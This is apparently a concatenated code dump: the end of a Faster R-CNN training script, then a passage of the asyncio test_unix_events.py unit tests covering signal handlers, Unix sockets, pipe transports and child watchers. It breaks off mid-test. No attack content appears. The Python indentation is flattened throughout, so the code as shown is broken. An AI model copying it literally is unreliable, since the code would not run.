print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 2 Fast R-CNN, init from stage 2 RPN R-CNN model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=str(rpn_stage2_out['model_path']),
solver=solvers[3],
max_iters=max_iters[3],
cfg=cfg,
rpn_file=rpn_stage2_out['proposal_path'])
p = mp.Process(target=train_fast_rcnn, kwargs=mp_kwargs)
p.start()
fast_rcnn_stage2_out = mp_queue.get()
p.join()
# Create final model (just a copy of the last stage)
final_path = os.path.join(
os.path.dirname(fast_rcnn_stage2_out['model_path']),
args.net_name + '_faster_rcnn_final.caffemodel')
print 'cp {} -> {}'.format(
fast_rcnn_stage2_out['model_path'], final_path)
shutil.copy(fast_rcnn_stage2_out['model_path'], final_path)
print 'Final model: {}'.format(final_path)
|
test_unix_events.py
|
"""Tests for unix_events.py."""
import collections
import gc
import errno
import io
import os
import pprint
import signal
import socket
import stat
import sys
import tempfile
import threading
import unittest
from unittest import mock
if sys.platform == 'win32':
raise unittest.SkipTest('UNIX only')
import asyncio
from asyncio import log
from asyncio import test_utils
from asyncio import unix_events
MOCK_ANY = mock.ANY
@unittest.skipUnless(signal, 'Signals are not supported')
class SelectorEventLoopSignalTests(unittest.TestCase):
def setUp(self):
self.loop = asyncio.SelectorEventLoop()
asyncio.set_event_loop(None)
def tearDown(self):
self.loop.close()
def test_check_signal(self):
self.assertRaises(
TypeError, self.loop._check_signal, '1')
self.assertRaises(
ValueError, self.loop._check_signal, signal.NSIG + 1)
def test_handle_signal_no_handler(self):
self.loop._handle_signal(signal.NSIG + 1, ())
def test_handle_signal_cancelled_handler(self):
h = asyncio.Handle(mock.Mock(), (),
loop=mock.Mock())
h.cancel()
self.loop._signal_handlers[signal.NSIG + 1] = h
self.loop.remove_signal_handler = mock.Mock()
self.loop._handle_signal(signal.NSIG + 1, ())
self.loop.remove_signal_handler.assert_called_with(signal.NSIG + 1)
@mock.patch('asyncio.unix_events.signal')
def test_add_signal_handler_setup_error(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.set_wakeup_fd.side_effect = ValueError
self.assertRaises(
RuntimeError,
self.loop.add_signal_handler,
signal.SIGINT, lambda: True)
@mock.patch('asyncio.unix_events.signal')
def test_add_signal_handler(self, m_signal):
m_signal.NSIG = signal.NSIG
cb = lambda: True
self.loop.add_signal_handler(signal.SIGHUP, cb)
h = self.loop._signal_handlers.get(signal.SIGHUP)
self.assertIsInstance(h, asyncio.Handle)
self.assertEqual(h._callback, cb)
@mock.patch('asyncio.unix_events.signal')
def test_add_signal_handler_install_error(self, m_signal):
m_signal.NSIG = signal.NSIG
def set_wakeup_fd(fd):
if fd == -1:
raise ValueError()
m_signal.set_wakeup_fd = set_wakeup_fd
class Err(OSError):
errno = errno.EFAULT
m_signal.signal.side_effect = Err
self.assertRaises(
Err,
self.loop.add_signal_handler,
signal.SIGINT, lambda: True)
@mock.patch('asyncio.unix_events.signal')
@mock.patch('asyncio.base_events.logger')
def test_add_signal_handler_install_error2(self, m_logging, m_signal):
m_signal.NSIG = signal.NSIG
class Err(OSError):
errno = errno.EINVAL
m_signal.signal.side_effect = Err
self.loop._signal_handlers[signal.SIGHUP] = lambda: True
self.assertRaises(
RuntimeError,
self.loop.add_signal_handler,
signal.SIGINT, lambda: True)
self.assertFalse(m_logging.info.called)
self.assertEqual(1, m_signal.set_wakeup_fd.call_count)
@mock.patch('asyncio.unix_events.signal')
@mock.patch('asyncio.base_events.logger')
def test_add_signal_handler_install_error3(self, m_logging, m_signal):
class Err(OSError):
errno = errno.EINVAL
m_signal.signal.side_effect = Err
m_signal.NSIG = signal.NSIG
self.assertRaises(
RuntimeError,
self.loop.add_signal_handler,
signal.SIGINT, lambda: True)
self.assertFalse(m_logging.info.called)
self.assertEqual(2, m_signal.set_wakeup_fd.call_count)
@mock.patch('asyncio.unix_events.signal')
def test_remove_signal_handler(self, m_signal):
m_signal.NSIG = signal.NSIG
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
self.assertTrue(
self.loop.remove_signal_handler(signal.SIGHUP))
self.assertTrue(m_signal.set_wakeup_fd.called)
self.assertTrue(m_signal.signal.called)
self.assertEqual(
(signal.SIGHUP, m_signal.SIG_DFL), m_signal.signal.call_args[0])
@mock.patch('asyncio.unix_events.signal')
def test_remove_signal_handler_2(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.SIGINT = signal.SIGINT
self.loop.add_signal_handler(signal.SIGINT, lambda: True)
self.loop._signal_handlers[signal.SIGHUP] = object()
m_signal.set_wakeup_fd.reset_mock()
self.assertTrue(
self.loop.remove_signal_handler(signal.SIGINT))
self.assertFalse(m_signal.set_wakeup_fd.called)
self.assertTrue(m_signal.signal.called)
self.assertEqual(
(signal.SIGINT, m_signal.default_int_handler),
m_signal.signal.call_args[0])
@mock.patch('asyncio.unix_events.signal')
@mock.patch('asyncio.base_events.logger')
def test_remove_signal_handler_cleanup_error(self, m_logging, m_signal):
m_signal.NSIG = signal.NSIG
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
m_signal.set_wakeup_fd.side_effect = ValueError
self.loop.remove_signal_handler(signal.SIGHUP)
self.assertTrue(m_logging.info)
@mock.patch('asyncio.unix_events.signal')
def test_remove_signal_handler_error(self, m_signal):
m_signal.NSIG = signal.NSIG
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
m_signal.signal.side_effect = OSError
self.assertRaises(
OSError, self.loop.remove_signal_handler, signal.SIGHUP)
@mock.patch('asyncio.unix_events.signal')
def test_remove_signal_handler_error2(self, m_signal):
m_signal.NSIG = signal.NSIG
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
class Err(OSError):
errno = errno.EINVAL
m_signal.signal.side_effect = Err
self.assertRaises(
RuntimeError, self.loop.remove_signal_handler, signal.SIGHUP)
@mock.patch('asyncio.unix_events.signal')
def test_close(self, m_signal):
m_signal.NSIG = signal.NSIG
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
self.loop.add_signal_handler(signal.SIGCHLD, lambda: True)
self.assertEqual(len(self.loop._signal_handlers), 2)
m_signal.set_wakeup_fd.reset_mock()
self.loop.close()
self.assertEqual(len(self.loop._signal_handlers), 0)
m_signal.set_wakeup_fd.assert_called_once_with(-1)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'),
'UNIX Sockets are not supported')
class SelectorEventLoopUnixSocketTests(unittest.TestCase):
def setUp(self):
self.loop = asyncio.SelectorEventLoop()
asyncio.set_event_loop(None)
def tearDown(self):
self.loop.close()
def test_create_unix_server_existing_path_sock(self):
with test_utils.unix_socket_path() as path:
sock = socket.socket(socket.AF_UNIX)
sock.bind(path)
with sock:
coro = self.loop.create_unix_server(lambda: None, path)
with self.assertRaisesRegex(OSError,
'Address.*is already in use'):
self.loop.run_until_complete(coro)
def test_create_unix_server_existing_path_nonsock(self):
with tempfile.NamedTemporaryFile() as file:
coro = self.loop.create_unix_server(lambda: None, file.name)
with self.assertRaisesRegex(OSError,
'Address.*is already in use'):
self.loop.run_until_complete(coro)
def test_create_unix_server_ssl_bool(self):
coro = self.loop.create_unix_server(lambda: None, path='spam',
ssl=True)
with self.assertRaisesRegex(TypeError,
'ssl argument must be an SSLContext'):
self.loop.run_until_complete(coro)
def test_create_unix_server_nopath_nosock(self):
coro = self.loop.create_unix_server(lambda: None, path=None)
with self.assertRaisesRegex(ValueError,
'path was not specified, and no sock'):
self.loop.run_until_complete(coro)
def test_create_unix_server_path_inetsock(self):
sock = socket.socket()
with sock:
coro = self.loop.create_unix_server(lambda: None, path=None,
sock=sock)
with self.assertRaisesRegex(ValueError,
'A UNIX Domain Socket was expected'):
self.loop.run_until_complete(coro)
@mock.patch('asyncio.unix_events.socket')
def test_create_unix_server_bind_error(self, m_socket):
# Ensure that the socket is closed on any bind error
sock = mock.Mock()
m_socket.socket.return_value = sock
sock.bind.side_effect = OSError
coro = self.loop.create_unix_server(lambda: None, path="/test")
with self.assertRaises(OSError):
self.loop.run_until_complete(coro)
self.assertTrue(sock.close.called)
sock.bind.side_effect = MemoryError
coro = self.loop.create_unix_server(lambda: None, path="/test")
with self.assertRaises(MemoryError):
self.loop.run_until_complete(coro)
self.assertTrue(sock.close.called)
def test_create_unix_connection_path_sock(self):
coro = self.loop.create_unix_connection(
lambda: None, '/dev/null', sock=object())
with self.assertRaisesRegex(ValueError, 'path and sock can not be'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_nopath_nosock(self):
coro = self.loop.create_unix_connection(
lambda: None, None)
with self.assertRaisesRegex(ValueError,
'no path and sock were specified'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_nossl_serverhost(self):
coro = self.loop.create_unix_connection(
lambda: None, '/dev/null', server_hostname='spam')
with self.assertRaisesRegex(ValueError,
'server_hostname is only meaningful'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_ssl_noserverhost(self):
coro = self.loop.create_unix_connection(
lambda: None, '/dev/null', ssl=True)
with self.assertRaisesRegex(
ValueError, 'you have to pass server_hostname when using ssl'):
self.loop.run_until_complete(coro)
class UnixReadPipeTransportTests(unittest.TestCase):
def setUp(self):
self.loop = test_utils.TestLoop()
self.protocol = test_utils.make_test_protocol(asyncio.Protocol)
self.pipe = mock.Mock(spec_set=io.RawIOBase)
self.pipe.fileno.return_value = 5
fcntl_patcher = mock.patch('fcntl.fcntl')
fcntl_patcher.start()
self.addCleanup(fcntl_patcher.stop)
fstat_patcher = mock.patch('os.fstat')
m_fstat = fstat_patcher.start()
st = mock.Mock()
st.st_mode = stat.S_IFIFO
m_fstat.return_value = st
self.addCleanup(fstat_patcher.stop)
def test_ctor(self):
tr = unix_events._UnixReadPipeTransport(
self.loop, self.pipe, self.protocol)
self.loop.assert_reader(5, tr._read_ready)
test_utils.run_briefly(self.loop)
self.protocol.connection_made.assert_called_with(tr)
def test_ctor_with_waiter(self):
fut = asyncio.Future(loop=self.loop)
unix_events._UnixReadPipeTransport(
self.loop, self.pipe, self.protocol, fut)
test_utils.run_briefly(self.loop)
self.assertIsNone(fut.result())
@mock.patch('os.read')
def test__read_ready(self, m_read):
tr = unix_events._UnixReadPipeTransport(
self.loop, self.pipe, self.protocol)
m_read.return_value = b'data'
tr._read_ready()
m_read.assert_called_with(5, tr.max_size)
self.protocol.data_received.assert_called_with(b'data')
@mock.patch('os.read')
def test__read_ready_eof(self, m_read):
tr = unix_events._UnixReadPipeTransport(
self.loop, self.pipe, self.protocol)
m_read.return_value = b''
tr._read_ready()
m_read.assert_called_with(5, tr.max_size)
self.assertFalse(self.loop.readers)
test_utils.run_briefly(self.loop)
self.protocol.eof_received.assert_called_with()
self.protocol.connection_lost.assert_called_with(None)
@mock.patch('os.read')
def test__read_ready_blocked(self, m_read):
tr = unix_events._UnixReadPipeTransport(
self.loop, self.pipe, self.protocol)
m_read.side_effect = BlockingIOError
tr._read_ready()
m_read.assert_called_with(5, tr.max_size)
test_utils.run_briefly(self.loop)
self.assertFalse(self.protocol.data_received.called)
@mock.patch('asyncio.log.logger.error')
@mock.patch('os.read')
def test__read_ready_error(self, m_read, m_logexc):
tr = unix_events._UnixReadPipeTransport(
self.loop, self.pipe, self.protocol)
err = OSError()
m_read.side_effect = err
tr._close = mock.Mock()
tr._read_ready()
m_read.assert_called_with(5, tr.max_size)
tr._close.assert_called_with(err)
m_logexc.assert_called_with(
test_utils.MockPattern(
'Fatal read error on pipe transport'
'\nprotocol:.*\ntransport:.*'),
exc_info=(OSError, MOCK_ANY, MOCK_ANY))
@mock.patch('os.read')
def test_pause_reading(self, m_read):
tr = unix_events._UnixReadPipeTransport(
self.loop, self.pipe, self.protocol)
m = mock.Mock()
self.loop.add_reader(5, m)
tr.pause_reading()
self.assertFalse(self.loop.readers)
@mock.patch('os.read')
def test_resume_reading(self, m_read):
tr = unix_events._UnixReadPipeTransport(
self.loop, self.pipe, self.protocol)
tr.resume_reading()
self.loop.assert_reader(5, tr._read_ready)
@mock.patch('os.read')
def test_close(self, m_read):
tr = unix_events._UnixReadPipeTransport(
self.loop, self.pipe, self.protocol)
tr._close = mock.Mock()
tr.close()
tr._close.assert_called_with(None)
@mock.patch('os.read')
def test_close_already_closing(self, m_read):
tr = unix_events._UnixReadPipeTransport(
self.loop, self.pipe, self.protocol)
tr._closing = True
tr._close = mock.Mock()
tr.close()
self.assertFalse(tr._close.called)
@mock.patch('os.read')
def test__close(self, m_read):
tr = unix_events._UnixReadPipeTransport(
self.loop, self.pipe, self.protocol)
err = object()
tr._close(err)
self.assertTrue(tr._closing)
self.assertFalse(self.loop.readers)
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(err)
def test__call_connection_lost(self):
tr = unix_events._UnixReadPipeTransport(
self.loop, self.pipe, self.protocol)
err = None
tr._call_connection_lost(err)
self.protocol.connection_lost.assert_called_with(err)
self.pipe.close.assert_called_with()
self.assertIsNone(tr._protocol)
self.assertEqual(2, sys.getrefcount(self.protocol),
pprint.pformat(gc.get_referrers(self.protocol)))
self.assertIsNone(tr._loop)
self.assertEqual(4, sys.getrefcount(self.loop),
pprint.pformat(gc.get_referrers(self.loop)))
def test__call_connection_lost_with_err(self):
tr = unix_events._UnixReadPipeTransport(
self.loop, self.pipe, self.protocol)
err = OSError()
tr._call_connection_lost(err)
self.protocol.connection_lost.assert_called_with(err)
self.pipe.close.assert_called_with()
self.assertIsNone(tr._protocol)
self.assertEqual(2, sys.getrefcount(self.protocol),
pprint.pformat(gc.get_referrers(self.protocol)))
self.assertIsNone(tr._loop)
self.assertEqual(4, sys.getrefcount(self.loop),
pprint.pformat(gc.get_referrers(self.loop)))
class UnixWritePipeTransportTests(unittest.TestCase):
def setUp(self):
self.loop = test_utils.TestLoop()
self.protocol = test_utils.make_test_protocol(asyncio.BaseProtocol)
self.pipe = mock.Mock(spec_set=io.RawIOBase)
self.pipe.fileno.return_value = 5
fcntl_patcher = mock.patch('fcntl.fcntl')
fcntl_patcher.start()
self.addCleanup(fcntl_patcher.stop)
fstat_patcher = mock.patch('os.fstat')
m_fstat = fstat_patcher.start()
st = mock.Mock()
st.st_mode = stat.S_IFSOCK
m_fstat.return_value = st
self.addCleanup(fstat_patcher.stop)
def test_ctor(self):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
self.loop.assert_reader(5, tr._read_ready)
test_utils.run_briefly(self.loop)
self.protocol.connection_made.assert_called_with(tr)
def test_ctor_with_waiter(self):
fut = asyncio.Future(loop=self.loop)
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol, fut)
self.loop.assert_reader(5, tr._read_ready)
test_utils.run_briefly(self.loop)
self.assertEqual(None, fut.result())
def test_can_write_eof(self):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
self.assertTrue(tr.can_write_eof())
@mock.patch('os.write')
def test_write(self, m_write):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
m_write.return_value = 4
tr.write(b'data')
m_write.assert_called_with(5, b'data')
self.assertFalse(self.loop.writers)
self.assertEqual([], tr._buffer)
@mock.patch('os.write')
def test_write_no_data(self, m_write):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
tr.write(b'')
self.assertFalse(m_write.called)
self.assertFalse(self.loop.writers)
self.assertEqual([], tr._buffer)
@mock.patch('os.write')
def test_write_partial(self, m_write):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
m_write.return_value = 2
tr.write(b'data')
m_write.assert_called_with(5, b'data')
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual([b'ta'], tr._buffer)
@mock.patch('os.write')
def test_write_buffer(self, m_write):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
self.loop.add_writer(5, tr._write_ready)
tr._buffer = [b'previous']
tr.write(b'data')
self.assertFalse(m_write.called)
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual([b'previous', b'data'], tr._buffer)
@mock.patch('os.write')
def test_write_again(self, m_write):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
m_write.side_effect = BlockingIOError()
tr.write(b'data')
m_write.assert_called_with(5, b'data')
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual([b'data'], tr._buffer)
@mock.patch('asyncio.unix_events.logger')
@mock.patch('os.write')
def test_write_err(self, m_write, m_log):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
err = OSError()
m_write.side_effect = err
tr._fatal_error = mock.Mock()
tr.write(b'data')
m_write.assert_called_with(5, b'data')
self.assertFalse(self.loop.writers)
self.assertEqual([], tr._buffer)
tr._fatal_error.assert_called_with(
err,
'Fatal write error on pipe transport')
self.assertEqual(1, tr._conn_lost)
tr.write(b'data')
self.assertEqual(2, tr._conn_lost)
tr.write(b'data')
tr.write(b'data')
tr.write(b'data')
tr.write(b'data')
# This is a bit overspecified. :-(
m_log.warning.assert_called_with(
'pipe closed by peer or os.write(pipe, data) raised exception.')
@mock.patch('os.write')
def test_write_close(self, m_write):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
tr._read_ready() # pipe was closed by peer
tr.write(b'data')
self.assertEqual(tr._conn_lost, 1)
tr.write(b'data')
self.assertEqual(tr._conn_lost, 2)
def test__read_ready(self):
tr = unix_events._UnixWritePipeTransport(self.loop, self.pipe,
self.protocol)
tr._read_ready()
self.assertFalse(self.loop.readers)
self.assertFalse(self.loop.writers)
self.assertTrue(tr._closing)
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(None)
@mock.patch('os.write')
def test__write_ready(self, m_write):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
self.loop.add_writer(5, tr._write_ready)
tr._buffer = [b'da', b'ta']
m_write.return_value = 4
tr._write_ready()
m_write.assert_called_with(5, b'data')
self.assertFalse(self.loop.writers)
self.assertEqual([], tr._buffer)
@mock.patch('os.write')
def test__write_ready_partial(self, m_write):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
self.loop.add_writer(5, tr._write_ready)
tr._buffer = [b'da', b'ta']
m_write.return_value = 3
tr._write_ready()
m_write.assert_called_with(5, b'data')
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual([b'a'], tr._buffer)
@mock.patch('os.write')
def test__write_ready_again(self, m_write):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
self.loop.add_writer(5, tr._write_ready)
tr._buffer = [b'da', b'ta']
m_write.side_effect = BlockingIOError()
tr._write_ready()
m_write.assert_called_with(5, b'data')
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual([b'data'], tr._buffer)
@mock.patch('os.write')
def test__write_ready_empty(self, m_write):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
self.loop.add_writer(5, tr._write_ready)
tr._buffer = [b'da', b'ta']
m_write.return_value = 0
tr._write_ready()
m_write.assert_called_with(5, b'data')
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual([b'data'], tr._buffer)
@mock.patch('asyncio.log.logger.error')
@mock.patch('os.write')
def test__write_ready_err(self, m_write, m_logexc):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
self.loop.add_writer(5, tr._write_ready)
tr._buffer = [b'da', b'ta']
m_write.side_effect = err = OSError()
tr._write_ready()
m_write.assert_called_with(5, b'data')
self.assertFalse(self.loop.writers)
self.assertFalse(self.loop.readers)
self.assertEqual([], tr._buffer)
self.assertTrue(tr._closing)
m_logexc.assert_called_with(
test_utils.MockPattern(
'Fatal write error on pipe transport'
'\nprotocol:.*\ntransport:.*'),
exc_info=(OSError, MOCK_ANY, MOCK_ANY))
self.assertEqual(1, tr._conn_lost)
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(err)
@mock.patch('os.write')
def test__write_ready_closing(self, m_write):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
self.loop.add_writer(5, tr._write_ready)
tr._closing = True
tr._buffer = [b'da', b'ta']
m_write.return_value = 4
tr._write_ready()
m_write.assert_called_with(5, b'data')
self.assertFalse(self.loop.writers)
self.assertFalse(self.loop.readers)
self.assertEqual([], tr._buffer)
self.protocol.connection_lost.assert_called_with(None)
self.pipe.close.assert_called_with()
@mock.patch('os.write')
def test_abort(self, m_write):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
self.loop.add_writer(5, tr._write_ready)
self.loop.add_reader(5, tr._read_ready)
tr._buffer = [b'da', b'ta']
tr.abort()
self.assertFalse(m_write.called)
self.assertFalse(self.loop.readers)
self.assertFalse(self.loop.writers)
self.assertEqual([], tr._buffer)
self.assertTrue(tr._closing)
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(None)
def test__call_connection_lost(self):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
err = None
tr._call_connection_lost(err)
self.protocol.connection_lost.assert_called_with(err)
self.pipe.close.assert_called_with()
self.assertIsNone(tr._protocol)
self.assertEqual(2, sys.getrefcount(self.protocol),
pprint.pformat(gc.get_referrers(self.protocol)))
self.assertIsNone(tr._loop)
self.assertEqual(4, sys.getrefcount(self.loop),
pprint.pformat(gc.get_referrers(self.loop)))
def test__call_connection_lost_with_err(self):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
err = OSError()
tr._call_connection_lost(err)
self.protocol.connection_lost.assert_called_with(err)
self.pipe.close.assert_called_with()
self.assertIsNone(tr._protocol)
self.assertEqual(2, sys.getrefcount(self.protocol),
pprint.pformat(gc.get_referrers(self.protocol)))
self.assertIsNone(tr._loop)
self.assertEqual(4, sys.getrefcount(self.loop),
pprint.pformat(gc.get_referrers(self.loop)))
def test_close(self):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
tr.write_eof = mock.Mock()
tr.close()
tr.write_eof.assert_called_with()
def test_close_closing(self):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
tr.write_eof = mock.Mock()
tr._closing = True
tr.close()
self.assertFalse(tr.write_eof.called)
def test_write_eof(self):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
tr.write_eof()
self.assertTrue(tr._closing)
self.assertFalse(self.loop.readers)
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(None)
def test_write_eof_pending(self):
tr = unix_events._UnixWritePipeTransport(
self.loop, self.pipe, self.protocol)
tr._buffer = [b'data']
tr.write_eof()
self.assertTrue(tr._closing)
self.assertFalse(self.protocol.connection_lost.called)
class AbstractChildWatcherTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
watcher = asyncio.AbstractChildWatcher()
self.assertRaises(
NotImplementedError, watcher.add_child_handler, f, f)
self.assertRaises(
NotImplementedError, watcher.remove_child_handler, f)
self.assertRaises(
NotImplementedError, watcher.attach_loop, f)
self.assertRaises(
NotImplementedError, watcher.close)
self.assertRaises(
NotImplementedError, watcher.__enter__)
self.assertRaises(
NotImplementedError, watcher.__exit__, f, f, f)
class BaseChildWatcherTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
watcher = unix_events.BaseChildWatcher()
self.assertRaises(
NotImplementedError, watcher._do_waitpid, f)
WaitPidMocks = collections.namedtuple("WaitPidMocks",
("waitpid",
"WIFEXITED",
"WIFSIGNALED",
"WEXITSTATUS",
"WTERMSIG",
))
class ChildWatcherTestsMixin:
ignore_warnings = mock.patch.object(log.logger, "warning")
def setUp(self):
self.loop = test_utils.TestLoop()
self.running = False
self.zombies = {}
with mock.patch.object(
self.loop, "add_signal_handler") as self.m_add_signal_handler:
self.watcher = self.create_watcher()
self.watcher.attach_loop(self.loop)
def waitpid(self, pid, flags):
if isinstance(self.watcher, asyncio.SafeChildWatcher) or pid != -1:
self.assertGreater(pid, 0)
try:
if pid < 0:
return self.zombies.popitem()
else:
return pid, self.zombies.pop(pid)
except KeyError:
pass
if self.running:
return 0, 0
else:
raise ChildProcessError()
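    # The fakes below encode waitpid() status words with a simple scheme:
    # a normal exit with return code ``rc`` is stored as ``rc + 32768`` (so any
    # status >= 32768 means "exited"), while death by signal ``sig`` is added
    # as ``add_zombie(pid, -sig)`` and therefore stored as ``32768 - sig``
    # (statuses strictly between 32700 and 32768 mean "signaled").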
def add_zombie(self, pid, returncode):
self.zombies[pid] = returncode + 32768
def WIFEXITED(self, status):
return status >= 32768
def WIFSIGNALED(self, status):
return 32700 < status < 32768
def WEXITSTATUS(self, status):
self.assertTrue(self.WIFEXITED(status))
return status - 32768
def WTERMSIG(self, status):
self.assertTrue(self.WIFSIGNALED(status))
return 32768 - status
def test_create_watcher(self):
self.m_add_signal_handler.assert_called_once_with(
signal.SIGCHLD, self.watcher._sig_chld)
def waitpid_mocks(func):
def wrapped_func(self):
def patch(target, wrapper):
return mock.patch(target, wraps=wrapper,
new_callable=mock.Mock)
with patch('os.WTERMSIG', self.WTERMSIG) as m_WTERMSIG, \
patch('os.WEXITSTATUS', self.WEXITSTATUS) as m_WEXITSTATUS, \
patch('os.WIFSIGNALED', self.WIFSIGNALED) as m_WIFSIGNALED, \
patch('os.WIFEXITED', self.WIFEXITED) as m_WIFEXITED, \
patch('os.waitpid', self.waitpid) as m_waitpid:
func(self, WaitPidMocks(m_waitpid,
m_WIFEXITED, m_WIFSIGNALED,
m_WEXITSTATUS, m_WTERMSIG,
))
return wrapped_func
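    # waitpid_mocks wraps a test method so os.waitpid and the os.W* status
    # macros are patched with the fake implementations above; the resulting
    # mocks are handed to the test as a WaitPidMocks namedtuple so call counts
    # can be asserted.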
@waitpid_mocks
def test_sigchld(self, m):
# register a child
callback = mock.Mock()
with self.watcher:
self.running = True
self.watcher.add_child_handler(42, callback, 9, 10, 14)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child is running
self.watcher._sig_chld()
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child terminates (returncode 12)
self.running = False
self.add_zombie(42, 12)
self.watcher._sig_chld()
self.assertTrue(m.WIFEXITED.called)
self.assertTrue(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
callback.assert_called_once_with(42, 12, 9, 10, 14)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WEXITSTATUS.reset_mock()
callback.reset_mock()
# ensure that the child is effectively reaped
self.add_zombie(42, 13)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback.called)
self.assertFalse(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WEXITSTATUS.reset_mock()
# sigchld called again
self.zombies.clear()
self.watcher._sig_chld()
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
@waitpid_mocks
def test_sigchld_two_children(self, m):
callback1 = mock.Mock()
callback2 = mock.Mock()
# register child 1
with self.watcher:
self.running = True
self.watcher.add_child_handler(43, callback1, 7, 8)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# register child 2
with self.watcher:
self.watcher.add_child_handler(44, callback2, 147, 18)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# children are running
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child 1 terminates (signal 3)
self.add_zombie(43, -3)
self.watcher._sig_chld()
callback1.assert_called_once_with(43, -3, 7, 8)
self.assertFalse(callback2.called)
self.assertTrue(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertTrue(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WTERMSIG.reset_mock()
callback1.reset_mock()
# child 2 still running
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child 2 terminates (code 108)
self.add_zombie(44, 108)
self.running = False
self.watcher._sig_chld()
callback2.assert_called_once_with(44, 108, 147, 18)
self.assertFalse(callback1.called)
self.assertTrue(m.WIFEXITED.called)
self.assertTrue(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WEXITSTATUS.reset_mock()
callback2.reset_mock()
# ensure that the children are effectively reaped
self.add_zombie(43, 14)
self.add_zombie(44, 15)
